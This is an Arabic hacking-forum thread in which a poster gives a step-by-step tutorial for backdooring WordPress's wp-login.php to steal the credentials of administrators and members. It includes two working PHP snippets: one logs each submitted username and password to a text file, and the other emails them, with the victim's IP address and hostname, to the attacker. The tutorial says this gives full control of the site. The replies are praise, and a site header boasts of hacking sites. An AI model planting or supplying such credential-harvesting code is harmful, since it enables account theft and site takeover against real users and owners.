1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Mokhalad HaXor, بتاريخ ‏30 ديسمبر 2014.

كاتب الموضوع : Mokhalad HaXor المشاهدات : 750 الردود : 16 ‏30 ديسمبر 2014
  1. غير متصل

    Mokhalad HaXor
    V • I • P

    عضو منذ:
    ‏3 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,460
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:

    [​IMG]

    كيف حال اعضاء و زوار المنتدى الحبيب

    [​IMG]
    شلونكم شباب انشاء الله بخير اليوم حبيت ان اشرحلكم طريقة جديدة ب تلغيم السكربتات و هذي المرة راح اشرح على سكربت قوي اسمة سكربت WordPress , طبعآ اكو مواقع معروفة و مشهورة منصبة هذا السكربت و غني عن التعريف طبعآ
    [​IMG]

    ندخل ب الموضوع
    الان الهدف هوة نقوم ب تلغيم السكربت , سحب معلومات كل عضو يدخل الى هذا السكربت ب طريقتين يعني لو وصلت ل كونفك الاستضافة كان صاحب الاستضافة منصب سكربت وورد بريس راح تكون جميع يوزرات المشتركين عندك على الايميل في يومين او اقل
    [​IMG]
    تمام نبدي على بركة الله
    نقوم ب فتح هذا الملف و تعديله

    [​IMG]
    wp-login.php

    [​IMG]

    نبحث على هذا السطر 632 او ذني الاسطر

    تمام بعد الوصول ل هذا السطر

    [PHP CODE]632 --> if ( ( empty( $redirect_to ) || $redirect_to == 'wp-admin/' || $redirect_to == admin_url() ) ) {
    634 --> if ( is_multisite() && !get_active_blog_for_user($user->ID) && !is_super_admin( $user->ID ) )

    [/PHP CODE]

    نضيف هذا الكود بعد السطرين مباشرآ !
    [​IMG]
    [PHP CODE]// By Mokhalad HaXor
    file_put_contents("Account.txt","The UserName:{$_POST['log']}\nThe Password:{$_POST['pwd']}\n------------\n",FILE_APPEND);
    // By Mokhalad HaXor
    [/PHP CODE]


    الان يقوم ب حفظ الحسابات ب ملف اسمة
    Account.txt

    [​IMG]
    تمام الحمد لله اتممنا الطريقة الاولى ب نجاح
    الان ناتي ل الطريقة الثانية المميزة اكثر من الاولى ب النسبة لي و هية تقوم ب ارسال المعلومات الى البريد الالكتروني بدل من حفظ المعلومات ب ملف
    ناتي الى الطريقة الان , نقوم ب نفس الطرق السابقة في التلغيمة الاولى و نقوم فقط ب استبدال الكود الاول الي يحفظ الحسابات على شكل ملف ب هذا الكود

    [​IMG]
    [PHP CODE]function curPageURL() {
    $pageURL = 'http';if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}$pageURL .= "://";
    if ($_SERVER["SERVER_PORT"] != "80") {
    $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];} else {
    $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];}return $pageURL;}
    $url = curPageURL();
    $ip = @getenv("REMOTE_ADDR");
    $hostname = @gethostbyaddr($ip);
    $message = "------------------+ WordPress Account +-----------------\n";
    $message .= "Forum URL : {$url}\n";
    $message .= "Email : {$_POST['log']}\n";
    $message .= "Password : {$_POST['pwd']}\n";
    $message .= "----------------------- By Mokhalad HaXor --------------------------\n";
    $message .= "Victim IP : {$ip}\n";
    $message .= "HostName : {$hostname}\n";
    $message .= "-------------------+ Created By Mokhalad HaXor +--------------------\n";
    $send= "بريدك الالكتروني الذي تريد ان يصل اليه الريزولت";// Your Mail Here
    $subject = "{$url} | WordPress Account | {$ip}";
    $headers = "From: | {$_POST['log']} | WordPress Account<WordPress@Rezult.CoM>";
    mail($send,$subject,$message,$headers);
    [/PHP CODE]

    [​IMG]
    نحفظ الملف و الان عندما يدخل الادمن USER + PASS
    يجيك ل الايميل و بهذي الحالة راح تكون قد سيطرت على الموقع ب الكامل و متى تريد ت تدخل اليوزر و الباسوورد ل الادمن + الاعضاء يكون عندك ب كل سهولة و يسر
    ملاحظة راح توصلك الرسالة اما في ال Sapm او Inbox
    شكرآ ل الاستماع , انشاء الله اعجبكم الموضوع
    اي استفسار الردود موجودة
    [​IMG]
    للاسف وصلنا ل نهاية الموضوع اراكم في شروحات اخرى

    الموضوع اهداء لـ
    pir+_"te2
    м̨я.ǚs̲ǝя - الأوكراني - TeePlow - المعاقب الصدري - k!lwa s&rian ro0t - Ameer Eagle - مِحً ـمِدُ ألَعَ

    ـرآقَي - MR.CAPTCHA - ĐЯ-ЩΘЩΘ - AnonYmous-IQ -Pro.Mast3r
    Gaza-Dz - 割喉



    و الى كل اعضاء و زوار المنتدى الحبيب

    [​IMG]

    ً#ٌ5oًًًُ. ً#ٌ5oًًًُ. ً#ٌ5oًًًُ. ً#ٌ5oًًًُ.
    [​IMG]
    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    Dr-Dark Noir
    V • I • P

    عضو منذ:
    ‏17 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    22
    نقاط الجائزة:
    الوظيفة:
    Student
    الإقامة:

    رد: شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

    وعليكم السلام ورحمة الله وبركاته

    تسلم ايدك حبيبي مخلد على شرح رائع و طرح جميل جدآ :{11}:

    واصل ولا تحرمنا من جديدك :ُeُe0y:

    [​IMG]
     


  3. غير متصل

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات
    ExpErt DeveloPer

    عضو منذ:
    ‏31 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    458
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:

    رد: شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

    عشت حياتي [​IMG]
     


  4. غير متصل

    ŦђĘ βě$Ţ
    Developer

    عضو منذ:
    ‏4 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

    يعطيك العافية ي غالي
     


  5. غير متصل

    مصطفى الموسوي
    V • I • P

    عضو منذ:
    ‏5 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    789
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    رد: شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

    عاشت ايدك حب
     


  6. غير متصل

    нєαяτ
    rankrank
    Developer

    عضو منذ:
    ‏7 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

    بارك الله فيك يا اخى الكريم الى الامام دائما يا بطل
     


  7. غير متصل

    ṼíŘǜŠ - 34
    rank
    Developer

    عضو منذ:
    ‏9 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:

    رد: شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

    مشكوووووور أخوي Mokhalad HaXor
     


  8. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

    [FONT=ae_AlMothnna]عاشت ايدك ياورد[/FONT][FONT=ae_AlMothnna]
    [/FONT]​
     


  9. غير متصل

    k!lwa s&rian ro0t Expert
    طاقم الإدارة

    عضو منذ:
    ‏3 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,236
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

    ابداعك لا متناهي ياغالي

    اشرك عالفن والدقة في الأداء ..

    بارك الله فيك ولك مني اجمل تحية
     


  10. غير متصل

    عــبــآس آلــدرآجــي
    rank
    Developer

    عضو منذ:
    ‏1 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: شرح تلغيم سكربت WordPress وسحب عضويات الادمن والاعضاء بطريقتين

    عـشت يلغآلي..
    شرح جميل..
    بارك الله فيك..
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...